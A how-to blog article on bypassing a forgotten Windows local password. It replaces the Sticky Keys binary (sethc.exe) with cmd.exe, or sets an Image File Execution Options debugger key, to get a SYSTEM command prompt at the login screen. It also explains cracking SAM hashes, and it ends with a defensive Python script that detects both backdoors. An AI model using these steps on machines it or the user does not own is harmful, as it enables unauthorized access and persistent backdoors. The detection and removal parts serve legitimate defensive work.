Create Password Reset Backdoor to Bypass any Windows Login

Imagine coming home after a long stay in hospital, sitting down at your computer to watch some movies and other stuff, and realising that you have forgotten your Windows login password. Whatever the reason you forgot it, there is a solution.

Know the Fact: - Most people try every combination they can remember, and if none of them works they decide to format Windows. A geek never takes such a crude decision; he looks for a way around the problem.

This article shows you how to reset a forgotten local account password, whether you are running the old Windows XP or the newer, better secured Windows 10. Two caveats up front: the method needs offline access to the system drive, so it does not work when the drive is protected with BitLocker (or Device Encryption) and you do not have the recovery key; and both tricks described here are well known and flagged by modern endpoint protection, including Microsoft Defender, so on a managed machine expect them to be noticed.

Know About the Windows Security

Microsoft Windows stores local user credentials in the SAM (Security Account Manager) registry hive, kept on disk as %SystemRoot%\System32\config\SAM. For obvious reasons you cannot open that file directly while the OS is running: it is locked by the kernel and readable only by SYSTEM. Windows never stores the password itself; whenever you set or change a login password, only the hash is written into the SAM database (the NT hash, an MD4 digest of the UTF-16LE password, plus the much weaker LM hash on old systems). The hashes are additionally encrypted with a key derived from the SYSTEM hive, which is why offline tools need both the SAM and the SYSTEM files.

There are a couple of tools that can import the SAM (together with the SYSTEM hive) and extract the password hashes. Because the NT hash is unsalted, you can often recover the original password by brute force or a dictionary attack, and precomputed tables work against it. CrackStation is an online service that looks hashes up in such tables.

Windows has two types of user account: (i) local accounts and (ii) domain accounts. When you sign in as a local user, your username and the hash of your password are stored on the computer itself. A domain account is different: it belongs to an Active Directory domain, its credentials are verified by and stored on the domain controller (a live server), not on the user's computer, and the reset described below cannot change it. Signing in with a Microsoft account is a third, cloud-backed variant that is also not a plain local account; the password reset in this article is for local accounts only.



Create Backdoor First

As you may know, pressing the Shift key five times turns on Sticky Keys in Windows. Microsoft introduced this accessibility feature for people with motor impairments who cannot press key combinations at the same time. Sticky Keys can be triggered as soon as the computer has started, even at the login screen, and the program behind it runs there as SYSTEM, which is exactly what makes it useful for us.

Here we create a backdoor so that pressing Shift five times opens a Command Prompt (cmd.exe) instead of Sticky Keys.

The Sticky Keys accessibility program is stored in Windows under the name sethc.exe. The plan is to overwrite sethc.exe with a copy of cmd.exe.

1. Boot your computer from a Windows installer USB/CD/DVD

2. Select the Repair your computer link on the Install Windows screen

3. Click the Troubleshoot option

4. Then select Advanced options

5. Choose the Command Prompt tool

The command prompt is a powerful tool for an administrator: you can reset a login password without entering the old one, add a new user as an administrator, delete an existing user, and much more. The command prompt opened from the recovery environment has full access to the offline system drive, which is why the next steps need no password at all.

Now, in the command prompt, type the commands below.

1. Enter this command to keep a backup copy of sethc.exe, then press Enter
copy c:\windows\system32\sethc.exe c:\

2. Type the command below to overwrite sethc.exe with cmd.exe without being asked for confirmation, and hit Enter
copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

3. Exit the command prompt by typing exit, reboot, and at the login screen tap the Shift key five times. A command prompt pops up, running as SYSTEM.

4. Enter net user to list the accounts on the PC.

5. Then type net user username password, replacing username with your account name and password with the new password. If the username contains spaces, put it in double quotes; use net user username * instead if you prefer to be prompted so the new password is not echoed on screen.

6. Exit the command prompt and log in with your new password.

Now you are logged in. To prevent someone else exploiting the same method on your machine, follow the same steps up to launching the command prompt from the installer and restore the original Sticky Keys binary with the command below, then delete the backup copy from c:\.
copy /y c:\sethc.exe c:\windows\system32\sethc.exe

If you are already logged in and want to install the same backdoor so that you can reset the password at any time without an installer disc, the copy above will not work: on a running system sethc.exe is owned by TrustedInstaller and even an administrator cannot overwrite it without first taking ownership. Here is a simpler alternative that achieves the same.

1. Run the command prompt as administrator

2. Paste the command below (a single line) and hit Enter
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
This Image File Execution Options entry tells Windows to launch the listed "debugger" whenever sethc.exe is started, so the command prompt appears instead of Sticky Keys and the file on disk is never touched. If you get the success message, the backdoor is installed. If not, make sure you are logged in as a user with administrative privileges and that the command prompt itself was run as administrator.

3. To remove the backdoor later, delete the key with this command
REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f

Check Now: - Make sure of the drive letter where your system files are installed (probably C: or D:; the recovery environment often maps the Windows volume to a different letter than the running system does, so run dir C:\ and dir D:\ and look for the Windows folder). Replace C: with the corresponding drive letter in the commands above.
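To check a machine for both backdoors described above (the on-disk sethc.exe swap and the IFEO Debugger entry), here is an added Python audit script that is not part of the original article. The core checks take plain dictionaries and are exercised with constructed sample data, so they run anywhere; on Windows the collectors at the bottom read the live IFEO key and hash the real binaries in System32. The list of accessibility executables is my assumption of what to cover: it extends the article's sethc.exe to the other programs reachable from the logon screen (Utilman, OSK, Narrator, Magnify, DisplaySwitch, AtBroker), which can be hijacked the same way.

```python
"""Audit for sethc.exe-style accessibility backdoors (added example)."""
import hashlib
import os
import sys
from typing import Dict, List

# Assumed scope: accessibility programs that winlogon can start at the logon screen.
ACCESSIBILITY_EXES = ("sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
                      "magnify.exe", "displayswitch.exe", "atbroker.exe")
IFEO_PATH = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"


def find_ifeo_hijacks(ifeo: Dict[str, Dict[str, str]]) -> List[str]:
    """ifeo maps IFEO subkey name -> {value name: data}. A Debugger value on
    an accessibility binary has no legitimate use and is reported."""
    findings = []
    for exe, values in ifeo.items():
        if exe.lower() not in ACCESSIBILITY_EXES:
            continue
        for name, data in values.items():
            if name.lower() == "debugger":
                findings.append(f"IFEO debugger set for {exe}: {data}")
    return findings


def find_replaced_binaries(hashes: Dict[str, str]) -> List[str]:
    """hashes maps file name -> sha256 hex. Reports any accessibility binary
    whose content is byte-identical to cmd.exe (the classic swap)."""
    cmd = hashes.get("cmd.exe")
    return [f"{name} is a copy of cmd.exe" for name in ACCESSIBILITY_EXES
            if cmd and hashes.get(name) == cmd]


def audit(ifeo: Dict[str, Dict[str, str]], hashes: Dict[str, str]) -> List[str]:
    return find_ifeo_hijacks(ifeo) + find_replaced_binaries(hashes)


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def collect_ifeo_windows() -> Dict[str, Dict[str, str]]:
    """Read every IFEO subkey and its values from the live registry (Windows only)."""
    import winreg
    result: Dict[str, Dict[str, str]] = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, IFEO_PATH) as root:
        i = 0
        while True:
            try:
                sub = winreg.EnumKey(root, i)
            except OSError:
                break
            i += 1
            values = {}
            with winreg.OpenKey(root, sub) as key:
                j = 0
                while True:
                    try:
                        name, data, _ = winreg.EnumValue(key, j)
                    except OSError:
                        break
                    j += 1
                    values[name] = str(data)
            result[sub] = values
    return result


def collect_hashes_windows() -> Dict[str, str]:
    """Hash cmd.exe and the accessibility binaries in System32 (Windows only)."""
    sysdir = os.path.join(os.environ.get("SystemRoot", r"C:\Windows"), "System32")
    return {n: sha256_file(os.path.join(sysdir, n))
            for n in ACCESSIBILITY_EXES + ("cmd.exe",)
            if os.path.exists(os.path.join(sysdir, n))}


# Constructed sample data mirroring the two backdoors from the article.
SAMPLE_IFEO = {
    "sethc.exe": {"Debugger": r"C:\windows\system32\cmd.exe"},   # the IFEO backdoor
    "notepad.exe": {"Debugger": "vsjitdebugger.exe -p"},        # not accessibility: ignored
    "utilman.exe": {"MitigationOptions": "0x100"},               # no Debugger: benign
}
SAMPLE_HASHES = {
    "cmd.exe": "aa" * 32,
    "sethc.exe": "aa" * 32,   # identical content to cmd.exe: swapped binary
    "utilman.exe": "bb" * 32,
}

if __name__ == "__main__":
    if sys.platform == "win32":
        findings = audit(collect_ifeo_windows(), collect_hashes_windows())
    else:
        findings = audit(SAMPLE_IFEO, SAMPLE_HASHES)
    print("\n".join(findings) or "no accessibility backdoor found")
```

If the on-disk check fires, sfc /scannow restores the original sethc.exe from the component store; if the IFEO check fires, the REG DELETE command above removes the entry. The hash comparison only catches the cmd.exe swap; checking the Authenticode signature of each binary (Get-AuthenticodeSignature in PowerShell) or comparing against a known-good copy is the more general test.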

Let me know in the comments if you run into any issues while creating the backdoor. If you find this guide helpful, share it on Facebook and Twitter.
